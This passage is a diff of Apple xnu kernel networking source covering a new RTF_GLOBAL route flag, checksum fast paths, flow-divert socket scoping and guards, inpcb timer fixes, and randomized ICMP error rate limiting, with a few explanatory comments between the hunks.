index c9ea3960c5b8d819ab19e1c2b553a3de18675fe0..a9745cb4208a1c10f7a3966296c980b60cc34df3 100644 (file)
@@ -95,9 +95,6 @@ static char normal_chars[] = {0, 0x80, 0xc0, 0xe0, 0xf0, 0xf8, 0xfc, 0xfe, -1};
 static char *rn_zeros, *rn_ones;
 
 
-extern lck_grp_t        *domain_proto_mtx_grp;
-extern lck_attr_t       *domain_proto_mtx_attr;
-
 #define rn_masktop (mask_rnhead->rnh_treetop)
 #undef Bcmp
 #define Bcmp(a, b, l) \
index a31e25bb60577f2e8359104fdb64bc670b28d4c0..91000a4ee0f250e9bc60afb0bb4117dd0dce40bb 100644 (file)
@@ -1847,6 +1847,14 @@ rtrequest_common_locked(int req, struct sockaddr *dst0,
            int, flags, unsigned int, ifscope);
 
        LCK_MTX_ASSERT(rnh_lock, LCK_MTX_ASSERT_OWNED);
+
+#if !(DEVELOPMENT || DEBUG)
+       /*
+        * Setting the global internet flag from outside the kernel is only for testing
+        */
+       flags &= ~RTF_GLOBAL;
+#endif /* !(DEVELOPMENT || DEBUG) */
+
        /*
         * Find the correct routing tree to use for this Address Family
         */
@@ -2342,6 +2350,16 @@ makeroute:
                 * necp client watchers to re-evaluate
                 */
                if (SA_DEFAULT(rt_key(rt))) {
+                       /*
+                        * Mark default routes as (potentially) leading to the global
+                        * internet; this can be used for policy decisions.
+                        * Cloned routes will inherit this flag.
+                        * We check against the host flag because this works both for
+                        * default routes that have a gateway and for default routes
+                        * when all subnets are local.
+                        */
+                       if (req == RTM_ADD && (rt->rt_flags & RTF_HOST) == 0) {
+                               rt->rt_flags |= RTF_GLOBAL;
+                       }
                        if (rt->rt_ifp != NULL) {
                                ifnet_touch_lastupdown(rt->rt_ifp);
                        }
index 613d61709923281193ce544bdc0a3c82b9d3698a..42cec6fab23b943dec49fb206dfcb9812c96fbe0 100644 (file)
@@ -314,7 +314,8 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea
 #define RTF_PROXY       0x8000000       /* proxying, no interface scope */
 #define RTF_ROUTER      0x10000000      /* host is a router */
 #define RTF_DEAD        0x20000000      /* Route entry is being freed */
-                                        /* 0x40000000 and up unassigned */
+#define RTF_GLOBAL      0x40000000      /* route to destination of the global internet */
+                                        /* 0x80000000 unassigned */
 
 #define RTPRF_OURS      RTF_PROTO3      /* set on routes we manage */
 #define RTF_BITS \
@@ -322,7 +323,7 @@ extern int route_op_entitlement_check(struct socket *, kauth_cred_t, int, boolea
        "\10DELCLONE\11CLONING\12XRESOLVE\13LLINFO\14STATIC\15BLACKHOLE" \
        "\16NOIFREF\17PROTO2\20PROTO1\21PRCLONING\22WASCLONED\23PROTO3" \
        "\25PINNED\26LOCAL\27BROADCAST\30MULTICAST\31IFSCOPE\32CONDEMNED" \
-       "\33IFREF\34PROXY\35ROUTER"
+       "\33IFREF\34PROXY\35ROUTER\37GLOBAL"
 
 #define IS_DIRECT_HOSTROUTE(rt) \
        (((rt)->rt_flags & (RTF_HOST | RTF_GATEWAY)) == RTF_HOST)
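/*
 * The new RTF_GLOBAL flag has the value 0x40000000, i.e. the 31st bit; the
 * "\37GLOBAL" entry added to the %b-style RTF_BITS string above is octal 37
 * (decimal 31), so the flag prints as "GLOBAL" in route dumps.  A minimal,
 * illustrative policy check (locking elided) would be:
 *
 *     if ((rt->rt_flags & RTF_GLOBAL) != 0) {
 *         // default route, or a route cloned from one, that may lead
 *         // to the global internet
 *     }
 */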
index f984a3e886a7fed0585773977df8cbd03ba483e5..cfeb61b53e266bf8b2661a73c6e12aacc7525564 100644 (file)
@@ -156,6 +156,10 @@ STUB(kern_packet_append);
 STUB(kern_packet_get_next);
 STUB(kern_packet_set_chain_counts);
 STUB(kern_packet_get_chain_counts);
+STUB(kern_packet_trace_start);
+STUB(kern_packet_trace_end);
+STUB(kern_packet_is_traced);
+STUB(kern_packet_trace_event);
 STUB(kern_pbufpool_alloc);
 STUB(kern_pbufpool_alloc_batch);
 STUB(kern_pbufpool_alloc_batch_callback);
index 2cdb63596e8b69ad8a2ccfe52e2669e6c02a1e03..e1cdf126ebb73b8740f41bee319de825660b6fdd 100644 (file)
@@ -108,27 +108,45 @@ uint32_t
 os_cpu_in_cksum(const void *data, uint32_t len, uint32_t initial_sum)
 {
        /*
-        * If data is 4-bytes aligned, length is multiple of 4-bytes,
-        * and the amount to checksum is small, this would be quicker;
-        * this is suitable for IPv4 header.
+        * If data is 4-byte aligned (only checked on some architectures),
+        * the length is a multiple of 4 bytes (required), and the amount to
+        * checksum is small, this would be quicker; this is suitable for
+        * IPv4/TCP headers.
         */
-       if (IS_P2ALIGNED(data, sizeof(uint32_t)) &&
-           len <= 64 && (len & 3) == 0) {
+       if (
+#if !defined(__arm64__) && !defined(__x86_64__)
+               IS_P2ALIGNED(data, sizeof(uint32_t)) &&
+#endif /* !__arm64__ && !__x86_64__ */
+               len <= 64 && (len & 3) == 0) {
                uint8_t *p = __DECONST(uint8_t *, data);
                uint64_t sum = initial_sum;
 
-               if (PREDICT_TRUE(len == 20)) {  /* simple IPv4 header */
+               switch (len) {
+               case 20:                /* simple IPv4 or TCP header */
                        sum += *(uint32_t *)(void *)p;
                        sum += *(uint32_t *)(void *)(p + 4);
                        sum += *(uint32_t *)(void *)(p + 8);
                        sum += *(uint32_t *)(void *)(p + 12);
                        sum += *(uint32_t *)(void *)(p + 16);
-               } else {
+                       break;
+
+               case 32:                /* TCP header + timestamp option */
+                       sum += *(uint32_t *)(void *)p;
+                       sum += *(uint32_t *)(void *)(p + 4);
+                       sum += *(uint32_t *)(void *)(p + 8);
+                       sum += *(uint32_t *)(void *)(p + 12);
+                       sum += *(uint32_t *)(void *)(p + 16);
+                       sum += *(uint32_t *)(void *)(p + 20);
+                       sum += *(uint32_t *)(void *)(p + 24);
+                       sum += *(uint32_t *)(void *)(p + 28);
+                       break;
+
+               default:
                        while (len) {
                                sum += *(uint32_t *)(void *)p;
                                p += 4;
                                len -= 4;
                        }
+                       break;
                }
 
                /* fold 64-bit to 16-bit (deferred carries) */
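/*
 * The fold itself is outside this hunk; the standard deferred-carry
 * reduction the comment refers to looks like the following sketch (the
 * exact xnu lines may differ):
 *
 *     sum = (sum >> 32) + (sum & 0xffffffff);   // 64 -> ~33 bits
 *     sum = (sum >> 16) + (sum & 0xffff);       // ~33 -> ~17 bits
 *     sum = (sum >> 16) + (sum & 0xffff);       // absorb carries
 *     sum = (sum >> 16) + (sum & 0xffff);       // now <= 0xffff
 *     return (uint32_t)sum;
 */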
index e278115c2717d0ca1b6e5177913be27b748e5471..818eb1beaf34c8a77b0eb0f64be2136de571bb2f 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2012-2017, 2020 Apple Inc. All rights reserved.
+ * Copyright (c) 2012-2017, 2020, 2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -80,6 +80,8 @@
 #define FLOW_DIVERT_NOTIFY_ON_RECEIVED  0x00000080
 #define FLOW_DIVERT_IMPLICIT_CONNECT    0x00000100
 #define FLOW_DIVERT_DID_SET_LOCAL_ADDR  0x00000200
+#define FLOW_DIVERT_HAS_TOKEN           0x00000400
+#define FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR 0x00000800
 
 #define FDLOG(level, pcb, format, ...) \
        os_log_with_type(OS_LOG_DEFAULT, flow_divert_syslog_type_to_oslog_type(level), "(%u): " format "\n", (pcb)->hash, __VA_ARGS__)
@@ -1374,6 +1376,13 @@ flow_divert_send_connect_result(struct flow_divert_pcb *fd_cb)
                goto done;
        }
 
+       if (fd_cb->local_endpoint.sa.sa_family == AF_INET || fd_cb->local_endpoint.sa.sa_family == AF_INET6) {
+               error = flow_divert_packet_append_tlv(packet, FLOW_DIVERT_TLV_LOCAL_ADDR, fd_cb->local_endpoint.sa.sa_len, &(fd_cb->local_endpoint.sa));
+               if (error) {
+                       goto done;
+               }
+       }
+
        error = flow_divert_send_packet(fd_cb, packet, TRUE);
        if (error) {
                goto done;
@@ -1812,12 +1821,12 @@ done:
 }
 
 static void
-flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint, bool port_only)
+flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *local_endpoint)
 {
        struct inpcb *inp = sotoinpcb(fd_cb->so);
 
        if (local_endpoint->sa_family == AF_INET6) {
-               if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && !port_only) {
+               if (IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr) && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) {
                        fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR;
                        inp->in6p_laddr = (satosin6(local_endpoint))->sin6_addr;
                }
@@ -1825,7 +1834,7 @@ flow_divert_set_local_endpoint(struct flow_divert_pcb *fd_cb, struct sockaddr *l
                        inp->inp_lport = (satosin6(local_endpoint))->sin6_port;
                }
        } else if (local_endpoint->sa_family == AF_INET) {
-               if (inp->inp_laddr.s_addr == INADDR_ANY && !port_only) {
+               if (inp->inp_laddr.s_addr == INADDR_ANY && (fd_cb->flags & FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR)) {
                        fd_cb->flags |= FLOW_DIVERT_DID_SET_LOCAL_ADDR;
                        inp->inp_laddr = (satosin(local_endpoint))->sin_addr;
                }
@@ -2032,8 +2041,10 @@ flow_divert_disable(struct flow_divert_pcb *fd_cb)
                    NULL,
                    (last_proc != NULL ? last_proc : current_proc()));
 
-               if (error) {
+               if (error && error != EWOULDBLOCK) {
                        FDLOG(LOG_ERR, fd_cb, "Failed to send queued data using the socket's original protocol: %d", error);
+               } else {
+                       error = 0;
                }
        } else if (SOCK_TYPE(so) == SOCK_DGRAM) {
                struct sockbuf *sb = &so->so_snd;
@@ -2134,6 +2145,78 @@ done:
        }
 }
 
+static void
+flow_divert_scope(struct flow_divert_pcb *fd_cb, int out_if_index, bool derive_new_address)
+{
+       struct socket *so = NULL;
+       struct inpcb *inp = NULL;
+       struct ifnet *current_ifp = NULL;
+       struct ifnet *new_ifp = NULL;
+       int error = 0;
+
+       so = fd_cb->so;
+       if (so == NULL) {
+               return;
+       }
+
+       inp = sotoinpcb(so);
+
+       if (out_if_index <= 0) {
+               return;
+       }
+
+       if (inp->inp_vflag & INP_IPV6) {
+               current_ifp = inp->in6p_last_outifp;
+       } else {
+               current_ifp = inp->inp_last_outifp;
+       }
+
+       if (current_ifp != NULL) {
+               if (current_ifp->if_index == out_if_index) {
+                       /* No change */
+                       return;
+               }
+
+               /* Scope the socket to the given interface */
+               error = inp_bindif(inp, out_if_index, &new_ifp);
+               if (error != 0) {
+                       FDLOG(LOG_ERR, fd_cb, "failed to scope to %d because inp_bindif returned %d", out_if_index, error);
+                       return;
+               }
+
+               if (derive_new_address && fd_cb->original_remote_endpoint != NULL) {
+                       /* Get the appropriate address for the given interface */
+                       if (inp->inp_vflag & INP_IPV6) {
+                               inp->in6p_laddr = sa6_any.sin6_addr;
+                               error = in6_pcbladdr(inp, fd_cb->original_remote_endpoint, &(fd_cb->local_endpoint.sin6.sin6_addr), NULL);
+                       } else {
+                               inp->inp_laddr.s_addr = INADDR_ANY;
+                               error = in_pcbladdr(inp, fd_cb->original_remote_endpoint, &(fd_cb->local_endpoint.sin.sin_addr), IFSCOPE_NONE, NULL, 0);
+                       }
+
+                       if (error != 0) {
+                               FDLOG(LOG_WARNING, fd_cb, "failed to derive a new local address from %d because in_pcbladdr returned %d", out_if_index, error);
+                       }
+               }
+       } else {
+               ifnet_head_lock_shared();
+               if (out_if_index <= if_index) {
+                       new_ifp = ifindex2ifnet[out_if_index];
+               }
+               ifnet_head_done();
+       }
+
+       /* Update the "last interface" of the socket */
+       if (new_ifp != NULL) {
+               if (inp->inp_vflag & INP_IPV6) {
+                       inp->in6p_last_outifp = new_ifp;
+               } else {
+                       inp->inp_last_outifp = new_ifp;
+               }
+
+       }
+}
+
 static void
 flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offset)
 {
@@ -2213,12 +2296,17 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet,
        FDLOCK(fd_cb);
        if (fd_cb->so != NULL) {
                struct inpcb                            *inp = NULL;
-               struct ifnet                            *ifp = NULL;
                struct flow_divert_group        *old_group;
                struct socket *so = fd_cb->so;
+               bool local_address_is_valid = false;
 
                socket_lock(so, 0);
 
+               if (!(so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring connect result");
+                       goto done;
+               }
+
                if (SOCK_TYPE(so) == SOCK_STREAM && !(so->so_state & SS_ISCONNECTING)) {
                        FDLOG0(LOG_ERR, fd_cb, "TCP socket is not in the connecting state, ignoring connect result");
                        goto done;
@@ -2233,13 +2321,28 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet,
                if (flow_divert_is_sockaddr_valid(&(local_endpoint.sa))) {
                        if (local_endpoint.sa.sa_family == AF_INET) {
                                local_endpoint.sa.sa_len = sizeof(struct sockaddr_in);
+                               if ((inp->inp_vflag & INP_IPV4) && local_endpoint.sin.sin_addr.s_addr != INADDR_ANY) {
+                                       local_address_is_valid = true;
+                                       fd_cb->local_endpoint = local_endpoint;
+                                       inp->inp_laddr.s_addr = INADDR_ANY;
+                               } else {
+                                       fd_cb->local_endpoint.sin.sin_port = local_endpoint.sin.sin_port;
+                               }
                        } else if (local_endpoint.sa.sa_family == AF_INET6) {
                                local_endpoint.sa.sa_len = sizeof(struct sockaddr_in6);
+                               if ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&local_endpoint.sin6.sin6_addr)) {
+                                       local_address_is_valid = true;
+                                       fd_cb->local_endpoint = local_endpoint;
+                                       inp->in6p_laddr = sa6_any.sin6_addr;
+                               } else {
+                                       fd_cb->local_endpoint.sin6.sin6_port = local_endpoint.sin6.sin6_port;
+                               }
                        }
-                       fd_cb->local_endpoint = local_endpoint;
-                       flow_divert_set_local_endpoint(fd_cb, &(local_endpoint.sa), (SOCK_TYPE(so) == SOCK_DGRAM));
                }
 
+               flow_divert_scope(fd_cb, out_if_index, !local_address_is_valid);
+               flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa));
+
                if (flow_divert_is_sockaddr_valid(&(remote_endpoint.sa)) && SOCK_TYPE(so) == SOCK_STREAM) {
                        if (remote_endpoint.sa.sa_family == AF_INET) {
                                remote_endpoint.sa.sa_len = sizeof(struct sockaddr_in);
@@ -2270,22 +2373,6 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet,
                        }
                }
 
-               ifnet_head_lock_shared();
-               if (out_if_index > 0 && out_if_index <= if_index) {
-                       ifp = ifindex2ifnet[out_if_index];
-               }
-
-               if (ifp != NULL) {
-                       if (inp->inp_vflag & INP_IPV4) {
-                               inp->inp_last_outifp = ifp;
-                       } else if (inp->inp_vflag & INP_IPV6) {
-                               inp->in6p_last_outifp = ifp;
-                       }
-               } else {
-                       error = EINVAL;
-               }
-               ifnet_head_done();
-
                if (error) {
                        goto set_socket_state;
                }
@@ -2398,6 +2485,11 @@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse
        if (fd_cb->so != NULL) {
                socket_lock(fd_cb->so, 0);
 
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring close from provider");
+                       goto done;
+               }
+
                fd_cb->so->so_error = (uint16_t)ntohl(close_error);
 
                flow_divert_update_closed_state(fd_cb, how, TRUE);
@@ -2410,7 +2502,7 @@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse
                } else if (how == SHUT_WR) {
                        socantsendmore(fd_cb->so);
                }
-
+done:
                socket_unlock(fd_cb->so, 0);
        }
        FDUNLOCK(fd_cb);
@@ -2457,6 +2549,11 @@ flow_divert_handle_data(struct flow_divert_pcb *fd_cb, mbuf_t packet, size_t off
 
                socket_lock(fd_cb->so, 0);
 
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring inbound data");
+                       goto done;
+               }
+
                if (sbspace(&fd_cb->so->so_rcv) == 0) {
                        error = ENOBUFS;
                        fd_cb->flags |= FLOW_DIVERT_NOTIFY_ON_RECEIVED;
@@ -2574,8 +2671,15 @@ flow_divert_handle_read_notification(struct flow_divert_pcb *fd_cb, mbuf_t packe
        FDLOCK(fd_cb);
        if (fd_cb->so != NULL) {
                socket_lock(fd_cb->so, 0);
+
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring read notification");
+                       goto done;
+               }
+
                fd_cb->send_window += ntohl(read_count);
                flow_divert_send_buffered_data(fd_cb, FALSE);
+done:
                socket_unlock(fd_cb->so, 0);
        }
        FDUNLOCK(fd_cb);
@@ -2655,25 +2759,14 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe
        if (fd_cb->so != NULL) {
                socket_lock(fd_cb->so, 0);
 
-               if (out_if_index > 0) {
-                       struct inpcb *inp = NULL;
-                       struct ifnet *ifp = NULL;
-
-                       inp = sotoinpcb(fd_cb->so);
-
-                       ifnet_head_lock_shared();
-                       if (out_if_index <= if_index) {
-                               ifp = ifindex2ifnet[out_if_index];
-                       }
+               if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) {
+                       FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring properties update");
+                       goto done;
+               }
 
-                       if (ifp != NULL) {
-                               if (inp->inp_vflag & INP_IPV4) {
-                                       inp->inp_last_outifp = ifp;
-                               } else if (inp->inp_vflag & INP_IPV6) {
-                                       inp->in6p_last_outifp = ifp;
-                               }
-                       }
-                       ifnet_head_done();
+               if (out_if_index > 0) {
+                       flow_divert_scope(fd_cb, out_if_index, true);
+                       flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa));
                }
 
                if (app_data_length > 0) {
@@ -2695,7 +2788,7 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe
                                FDLOG(LOG_ERR, fd_cb, "Failed to allocate a buffer of size %u to hold the application data from the properties update", app_data_length);
                        }
                }
-
+done:
                socket_unlock(fd_cb->so, 0);
        }
        FDUNLOCK(fd_cb);
@@ -3336,6 +3429,13 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t
                        goto done;
                }
 
+               if (SOCK_TYPE(so) == SOCK_STREAM || /* TCP or */
+                   !implicit || /* connect() was called or */
+                   ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr)) || /* local address is not un-specified */
+                   ((inp->inp_vflag & INP_IPV4) && inp->inp_laddr.s_addr != INADDR_ANY)) {
+                       fd_cb->flags |= FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR;
+               }
+
                error = flow_divert_create_connect_packet(fd_cb, to, so, p, &connect_packet);
                if (error) {
                        goto done;
@@ -3343,7 +3443,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t
 
                if (!implicit || SOCK_TYPE(so) == SOCK_STREAM) {
                        flow_divert_set_remote_endpoint(fd_cb, to);
-                       flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa), false);
+                       flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa));
                }
 
                if (implicit) {
@@ -3370,7 +3470,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t
                fd_cb->flags |= FLOW_DIVERT_CONNECT_STARTED;
        }
 
-       if (SOCK_TYPE(so) == SOCK_DGRAM) {
+       if (SOCK_TYPE(so) == SOCK_DGRAM && !(fd_cb->flags & FLOW_DIVERT_HAS_TOKEN)) {
                soisconnected(so);
        } else {
                soisconnecting(so);
@@ -3521,11 +3621,6 @@ flow_divert_data_out(struct socket *so, int flags, mbuf_t data, struct sockaddr
                if (error) {
                        goto done;
                }
-
-               if (so->so_flags1 & SOF1_DATA_IDEMPOTENT) {
-                       /* Open up the send window so that the data will get sent right away */
-                       fd_cb->send_window = (uint32_t)mbuf_pkthdr_len(data);
-               }
        } else {
                error = flow_divert_check_no_cellular(fd_cb) ||
                    flow_divert_check_no_expensive(fd_cb) ||
@@ -3798,6 +3893,8 @@ flow_divert_token_set(struct socket *so, struct sockopt *sopt)
 
                fd_cb->connect_token = token;
                token = NULL;
+
+               fd_cb->flags |= FLOW_DIVERT_HAS_TOKEN;
        }
 
        if (hmac_error == 0) {
index 5c320716768f0d207d9a0155439acda4c4327d1b..f24f476580817816b869dd1fb12051ae76c06f1a 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2019 Apple Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -694,7 +694,8 @@ struct icmp6stat {
 #define ICMPV6CTL_ND6_MAXQLEN           24
 #define ICMPV6CTL_ND6_ACCEPT_6TO4       25
 #define ICMPV6CTL_ND6_OPTIMISTIC_DAD    26      /* RFC 4429 */
-#define ICMPV6CTL_MAXID                 27
+#define ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR 27
+#define ICMPV6CTL_MAXID                 28
 
 #ifdef BSD_KERNEL_PRIVATE
 #define ICMPV6CTL_NAMES { \
index 42982241e01aefba40da9da71b8f2313c29cbb0e..3a45a787e6d37d36efe84f2ad38d481ac2aeaa6a 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2000-2013 Apple Inc. All rights reserved.
+ * Copyright (c) 2000-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -93,7 +93,8 @@ struct  icmpstat {
 #define ICMPCTL_STATS           2       /* statistics (read-only) */
 #define ICMPCTL_ICMPLIM         3
 #define ICMPCTL_TIMESTAMP       4       /* allow replies to time stamp requests */
-#define ICMPCTL_MAXID           5
+#define ICMPCTL_ICMPLIM_INCR    5
+#define ICMPCTL_MAXID           6
 
 #ifdef BSD_KERNEL_PRIVATE
 #define ICMPCTL_NAMES { \
index ef0731a8291254338bd83162ce91ff61f9022a38..6fd6e7121d9d1d03016665259b064a18808e1bbf 100644 (file)
@@ -331,8 +331,9 @@ in_pcbinit(void)
        lck_mtx_init(&inpcb_timeout_lock, inpcb_lock_grp, inpcb_lock_attr);
        inpcb_thread_call = thread_call_allocate_with_priority(inpcb_timeout,
            NULL, THREAD_CALL_PRIORITY_KERNEL);
+       /* Give it an arg so that we know that this is the fast timer */
        inpcb_fast_thread_call = thread_call_allocate_with_priority(
-               inpcb_timeout, NULL, THREAD_CALL_PRIORITY_KERNEL);
+               inpcb_timeout, &inpcb_timeout, THREAD_CALL_PRIORITY_KERNEL);
        if (inpcb_thread_call == NULL || inpcb_fast_thread_call == NULL) {
                panic("unable to alloc the inpcb thread call");
        }
@@ -353,7 +354,7 @@ in_pcbinit(void)
 static void
 inpcb_timeout(void *arg0, void *arg1)
 {
-#pragma unused(arg0, arg1)
+#pragma unused(arg1)
        struct inpcbinfo *ipi;
        boolean_t t, gc;
        struct intimercount gccnt, tmcnt;
@@ -419,10 +420,14 @@ inpcb_timeout(void *arg0, void *arg1)
                inpcb_ticking = INPCB_HAVE_TIMER_REQ(tmcnt);
        }
 
-       /* re-arm the timer if there's work to do */
+       /* arg0 will be set if we are the fast timer */
+       if (arg0 != NULL) {
+               inpcb_fast_timer_on = FALSE;
+       }
        inpcb_timeout_run--;
        VERIFY(inpcb_timeout_run >= 0 && inpcb_timeout_run < 2);
 
+       /* re-arm the timer if there's work to do */
        if (gccnt.intimer_nodelay > 0 || tmcnt.intimer_nodelay > 0) {
                inpcb_sched_timeout();
        } else if ((gccnt.intimer_fast + tmcnt.intimer_fast) <= 5) {
@@ -460,7 +465,7 @@ _inpcb_sched_timeout(unsigned int offset)
                inpcb_timeout_run++;
                if (offset == 0) {
                        inpcb_fast_timer_on = TRUE;
-                       thread_call_enter_delayed(inpcb_thread_call,
+                       thread_call_enter_delayed(inpcb_fast_thread_call,
                            deadline);
                } else {
                        inpcb_fast_timer_on = FALSE;
index b7b32693ab82e17d16bf819313d7333ba7699725..f4d981849ee063786738d700180f6701042f93a3 100644 (file)
@@ -80,6 +80,9 @@
 #include <kern/zalloc.h>
 #include <netinet/in_stat.h>
 #endif /* BSD_KERNEL_PRIVATE */
+#if !KERNEL
+#include <TargetConditionals.h>
+#endif
 
 #if IPSEC
 #include <netinet6/ipsec.h> /* for IPSEC */
@@ -370,7 +373,7 @@ struct  xinpcb {
        u_quad_t        xi_alignment_hack;
 };
 
-#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
+#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
 struct inpcb64_list_entry {
        u_int64_t   le_next;
        u_int64_t   le_prev;
@@ -412,7 +415,7 @@ struct  xinpcb64 {
        struct  xsocket64 xi_socket;
        u_quad_t        xi_alignment_hack;
 };
-#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
+#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */
 
 #ifdef PRIVATE
 struct xinpcb_list_entry {
index 800ec7cfbb14f26872d89f53cad4dae0159d43b6..1a97eb8c068b724faec3363c64f49e9b7862a965 100644 (file)
 
 #ifndef _NETINET_IN_SYSTM_H_
 #define _NETINET_IN_SYSTM_H_
+
+#ifndef DRIVERKIT
 #include <sys/appleapiopts.h>
+#endif /* DRIVERKIT */
+
 #include <sys/_types.h>
 
 /*
index 14aa9c9603881d7397a786546706defab832a727..0fb3d6f75d6daf58a66f945d4ee3abe6111d9384 100644 (file)
@@ -141,7 +141,6 @@ SYSCTL_INT(_net_inet_icmp, OID_AUTO, log_redirect,
 const static int icmp_datalen = 8;
 
 #if ICMP_BANDLIM
-
 /* Default values in case CONFIG_ICMP_BANDLIM is not defined in the MASTER file */
 #ifndef CONFIG_ICMP_BANDLIM
 #if XNU_TARGET_OS_OSX
@@ -159,15 +158,16 @@ const static int icmp_datalen = 8;
 static int      icmplim = CONFIG_ICMP_BANDLIM;
 SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RW | CTLFLAG_LOCKED,
     &icmplim, 0, "");
-
 #else /* ICMP_BANDLIM */
-
 static int      icmplim = -1;
 SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RD | CTLFLAG_LOCKED,
     &icmplim, 0, "");
-
 #endif /* ICMP_BANDLIM */
 
+static int      icmplim_random_incr = CONFIG_ICMP_BANDLIM;
+SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM_INCR, icmplim_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED,
+    &icmplim_random_incr, 0, "");
+
 /*
  * ICMP broadcast echo sysctl
  */
@@ -1074,11 +1074,8 @@ ip_next_mtu(int mtu, int dir)
 
 /*
  * badport_bandlim() - check for ICMP bandwidth limit
- *
- *     Return 0 if it is ok to send an ICMP error response, -1 if we have
- *     hit our bandwidth limit and it is not ok.
- *
- *     If icmplim is <= 0, the feature is disabled and 0 is returned.
+ *     Returns false when it is OK to send an ICMP error and true when the
+ *     error should be rate limited.
  *
  *     For now we separate the TCP and UDP subsystems w/ different 'which'
  *     values.  We may eventually remove this separation (and simplify the
@@ -1098,7 +1095,8 @@ badport_bandlim(int which)
        static int lpackets[BANDLIM_MAX + 1];
        uint64_t time;
        uint64_t secs;
-
+       static boolean_t is_initialized = FALSE;
+       static int icmplim_random;
        const char *bandlimittype[] = {
                "Limiting icmp unreach response",
                "Limiting icmp ping response",
@@ -1113,6 +1111,14 @@ badport_bandlim(int which)
                return false;
        }
 
+       if (is_initialized == FALSE) {
+               if (icmplim_random_incr > 0 &&
+                   icmplim <= INT32_MAX - (icmplim_random_incr + 1)) {
+                       icmplim_random = icmplim + (random() % icmplim_random_incr) + 1;
+               }
+               is_initialized = TRUE;
+       }
+
        time = net_uptime();
        secs = time - lticks[which];
 
@@ -1121,11 +1127,11 @@ badport_bandlim(int which)
         */
 
        if (secs > 1) {
-               if (lpackets[which] > icmplim) {
+               if (lpackets[which] > icmplim_random) {
                        printf("%s from %d to %d packets per second\n",
                            bandlimittype[which],
                            lpackets[which],
-                           icmplim
+                           icmplim_random
                            );
                }
                lticks[which] = time;
@@ -1135,9 +1141,16 @@ badport_bandlim(int which)
        /*
         * bump packet count
         */
-
-       if (++lpackets[which] > icmplim) {
-               return true;
+       if (++lpackets[which] > icmplim_random) {
+               /*
+                * After hitting the randomized limit, we further randomize how
+                * the rate limit is applied: errors are suppressed with a
+                * probability that increases as lpackets[which] grows.
+                */
+               if ((random() % (lpackets[which] - icmplim_random)) != 0) {
+                       return true;
+               }
        }
        return false;
 }
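/*
 * Worked example for the randomized limiter above (numbers are
 * illustrative): with icmplim == 250 and icmplim_random_incr == 500,
 * icmplim_random is chosen once, uniformly in [251, 750].  Within a
 * one-second window the first icmplim_random responses are sent
 * unthrottled.  For packet number n > icmplim_random the response is sent
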